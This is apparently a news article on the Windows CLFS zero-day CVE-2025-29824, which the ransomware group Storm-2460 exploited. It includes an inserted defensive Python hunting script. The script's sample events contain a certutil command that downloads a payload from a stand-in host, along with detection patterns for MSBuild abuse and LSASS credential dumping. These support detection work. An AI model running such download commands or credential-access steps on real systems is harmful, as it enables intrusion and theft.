Windows under attack: 0-day vulnerability used by ransomware group

Microsoft released security updates for Windows yesterday and revealed today that the update includes a patch for a 0-day issue that has been exploited in the wild.

The vulnerability, an elevation of privilege issue in the Windows Common Log File System Driver, is tracked as CVE-2025-29824.

Important Information:

  • The issue affects most supported server and client versions of Windows, including Windows 10, Windows 11 and Windows Server 2025.
  • Microsoft notes that exploitation does not work on Windows 11, version 24H2.
  • It is a use-after-free issue that can be exploited in local privilege escalation attacks.
  • No user interaction is required for the attack.
  • An attacker gains elevated privileges on successful exploitation.

Microsoft notes that it is aware of a limited number of attacks. It refers to targets in the IT and real estate sectors in the United States, the financial sector in Venezuela, a Spanish software company and a retail sector target in Saudi Arabia.

Installing the update protects systems against the exploit. Microsoft's guidance contains an ominous note suggesting that the company is delaying the patch for Windows 10 systems. No explanation for the delay is given. Affected users and administrators are asked to monitor the official CVE entry on Microsoft's MSRC website for updates about the rollout of the patch for Windows 10 systems.

Home users can use Windows Update to install the patch immediately on Windows 11, via Settings > Windows Update. Note that a system restart is required to finalize the installation of security updates.

On the technical side, the vulnerability is in the Common Log File System (CLFS) kernel driver, according to Microsoft. The company says it has not determined the initial access vector, but has discovered "some notable pre-exploitation behavior by Storm-2460".

Good to know: Storm-2460, also known as RansomEXX, is a notorious ransomware group.

Microsoft observed the following behavior in several cases:

  • The threat actor used the certutil certificate utility to download a malicious file from a legitimate but compromised third-party website.
  • The downloaded file was a malicious MSBuild file.
  • The malware in question is known as PipeMagic and has been known since 2023.
  • After the malware was deployed, it exploited the vulnerability described in this advisory and injected into system processes.

One of the malware's activities on the user's system is dumping and parsing LSASS memory to obtain user credentials. Ransomware activity followed on targeted systems, including file encryption and the addition of random file extensions.
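The behaviours Microsoft describes form a chain that a defender can hunt for in endpoint telemetry. The script below is an added example, not code from the article or from Microsoft: it runs over constructed, Sysmon-style process-creation and process-access events (hypothetical field names) and flags hosts that show at least two stages of the chain, assuming the "certificate tool" in the article is Windows certutil and that MSBuild running a project from a user-writable path is suspicious.

```python
import re
from collections import defaultdict

# Constructed, Sysmon-style events (hypothetical fields; not real telemetry).
# "proc" = process creation, "access" = one process opening another.
SAMPLE_EVENTS = [
    {"host": "ws01", "kind": "proc", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -f https://compromised.example/p.bin C:\Users\Public\p.proj"},
    {"host": "ws01", "kind": "proc", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\Public\p.proj"},
    {"host": "ws01", "kind": "access", "image": r"C:\Users\Public\p.exe",
     "target": r"C:\Windows\System32\lsass.exe"},
    {"host": "build02", "kind": "proc", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.sln /p:Configuration=Release"},  # benign developer build
]

# Paths a normal user can write to; a project built from here is unusual (assumption).
USER_WRITABLE = re.compile(r"\\(Users\\Public|Temp|ProgramData|AppData)\\", re.I)
# Processes that legitimately open LSASS (illustrative allow-list, tune for your estate).
TRUSTED_LSASS_READERS = {"csrss.exe", "wininit.exe", "msmpeng.exe", "lsass.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Map one event to a stage of the chain described in the advisory, or None."""
    img = basename(ev["image"])
    if ev["kind"] == "proc":
        if img == "certutil.exe" and re.search(r"https?://", ev["cmdline"], re.I):
            return "certutil_download"        # certutil abused to fetch the payload
        if img == "msbuild.exe" and USER_WRITABLE.search(ev["cmdline"]):
            return "msbuild_from_user_path"   # malicious MSBuild project file
    elif ev["kind"] == "access":
        if basename(ev["target"]) == "lsass.exe" and img not in TRUSTED_LSASS_READERS:
            return "lsass_access"             # credential dumping from LSASS
    return None

def hunt(events, min_stages=2):
    """Return {host: sorted stages} for hosts showing at least min_stages of the chain."""
    seen = defaultdict(set)
    for ev in events:
        stage = classify(ev)
        if stage:
            seen[ev["host"]].add(stage)
    return {h: sorted(s) for h, s in seen.items() if len(s) >= min_stages}

if __name__ == "__main__":
    for host, stages in hunt(SAMPLE_EVENTS).items():
        print(f"{host}: {' -> '.join(stages)}")
```

Requiring two stages per host keeps a lone developer build or a single certutil run from paging anyone, while the full chain on one host is a strong signal worth an incident ticket.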

Closing words

Given the exploitation attempts, Microsoft recommends installing the Windows security patch immediately to protect systems. The delay on Windows 10 is unfortunate, because it means those systems remain exposed to attack until Microsoft releases the patch for them.

Now you: when do you install updates on your system? Have you already installed the April 2025 security update?

Thanks for reading.



Source: gHacks
